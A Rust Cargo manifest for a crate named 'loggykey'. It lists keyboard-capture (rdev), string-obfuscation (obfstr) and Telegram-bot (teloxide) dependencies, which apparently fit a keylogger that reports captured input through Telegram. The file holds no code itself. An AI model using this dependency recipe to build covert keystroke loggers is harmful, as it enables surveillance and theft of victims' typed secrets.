[package]
name = "loggykey"
version = "0.1.0"
edition = "2021"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[profile.release]
opt-level = "s"
lto = true
panic = "abort"

[dependencies]
gethostname = "0.4.3"
obfstr = "0.4.3"
rdev = "0.5.3"
teloxide = { version = "0.12.2", features = ["macros"] }
tokio = { version = "1.35.0", features = ["rt-multi-thread", "macros"] }
webbrowser = "0.8.12"
